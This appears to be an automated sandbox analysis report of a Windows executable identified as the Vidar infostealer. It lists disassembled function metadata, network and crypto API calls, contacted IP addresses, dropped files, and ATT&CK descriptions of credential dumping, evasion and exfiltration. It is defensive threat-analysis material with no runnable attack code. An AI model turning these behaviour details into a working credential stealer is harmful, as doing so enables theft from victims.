Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 41a67d6f51596238d136b285a48fcd69bcb6d4f87ff1b86510e8bb5dc3d5c5fb
Instruction ID: e34f59464f7b4b8e3365e63b1ef19460ab66d035598eebc97781e2565865a95b
Opcode Fuzzy Hash: 41a67d6f51596238d136b285a48fcd69bcb6d4f87ff1b86510e8bb5dc3d5c5fb
Instruction Fuzzy Hash: DA118B31700212EBDF14FE7CD8889B973A6BF653207144579F8998B242C770EA408B95

Function 0008F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0008F35C

Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC5A
Part of subcall function 000AEC45: __CxxThrowException@8.LIBCMT ref: 000AEC6F
Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC80

memmove.MSVCRT(0008EEBE,0008EEBE,C6C68B00,0008EEBE,0008EEBE,0008F15F,?,?,?,0008F1DF,?,?,?,75920440,?,-00000001), ref: 0008F392

Strings

invalid string position, xrefs: 0008F357

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: af0f368cc2a8e6937f0a5530ca2dcded2f569b63cf75840b3aa21670e530b46a
Instruction ID: 3a5fc0512f4d3eedd439be250f763b229061b502e8907f3c275da440ee4c283f
Opcode Fuzzy Hash: af0f368cc2a8e6937f0a5530ca2dcded2f569b63cf75840b3aa21670e530b46a
Instruction Fuzzy Hash: 47016D713006428BD724AEB888D853EB6E6FB85B11724493CE0C2C7645DB78EE4A9790

Function 0009683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00086963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000869C5
Part of subcall function 00086963: StrCmpCA.SHLWAPI(?), ref: 000869DF
Part of subcall function 00086963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086A0E
Part of subcall function 00086963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00086A4D
Part of subcall function 00086963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00086A7D
Part of subcall function 00086963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00086A88
Part of subcall function 00086963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00086AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 00096873

Strings

ERROR, xrefs: 00096896
ERROR, xrefs: 0009686B

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: 59c41cfae56d89c27b1b636e1066575b0c4f585ebcd7d0fe826d73774409cdc5
Instruction ID: bd563485dc098b36682048132d7e7ac50a91f1c25fb58221e54ee47bceb2d2bf
Opcode Fuzzy Hash: 59c41cfae56d89c27b1b636e1066575b0c4f585ebcd7d0fe826d73774409cdc5
Instruction Fuzzy Hash: F6011935E00108ABCF61BB74E8479CE37E8BF14300B5502A1FDA4E7257EB25E9099BD2

Function 0009F3BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0009F3F0
DName::DName.LIBCMT ref: 0009F3FC

Strings

{flat}, xrefs: 0009F3EB

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: c13179d490690034dd7661ae56d412ee22a872a2de443cf778684e5a91c80265
Instruction ID: 59c9c54523334e45aa4f78f9c933b10d360959f8f1b73e1cdb1aed0d9390425b
Opcode Fuzzy Hash: c13179d490690034dd7661ae56d412ee22a872a2de443cf778684e5a91c80265
Instruction Fuzzy Hash: 59F0A9311802499FDF10DF58E845BF83BA0AB41755F188086FA8C4F296C770E941EBA1

Function 0008141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00081436
GlobalMemoryStatusEx.KERNEL32(?), ref: 00081449

Strings

@, xrefs: 00081442

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: 2e3aaa581628b3924a4d640209feb6f687098bd7450d8f199290561589365022
Instruction ID: 0644f32f697b8327f22f6dc7da330a8042b49a0511ae54f0c00df2718edfdb4f
Opcode Fuzzy Hash: 2e3aaa581628b3924a4d640209feb6f687098bd7450d8f199290561589365022
Instruction Fuzzy Hash: 89E0BFF0950208ABDB40EFA4DD46B9DB7B8AB08744F500125AA05E7282E674BA099755

Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_00088048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00088048
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000880A1 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_000880A1
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_00091E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00091E5D
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0008A7D8 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,	0_2_0008A7D8

Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: C:\Users\user\Desktop\noll.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]		0_2_000814AD
Source: C:\Users\user\Desktop\noll.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax		0_2_000814AD

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report noll.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199780418869[1].htm

C:\Users\user\AppData\Local\Temp\delays.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
noll.exe

Function 00098950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Function 00091807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143
memorycomtimeCOMMON

Function 0009C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440
COMMON

Function 00086963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161
networkfileCOMMON

Function 00085482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Function 0008E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Function 0008E186 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
registryCOMMON

Function 00085F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Function 00098643 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Function 00093B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Function 000969B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249
sleepCOMMON

Function 00081666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Function 00097041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029
networksleepCOMMON

Function 00085237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161
networkmemoryfileCOMMON

Function 00091997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114
comCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

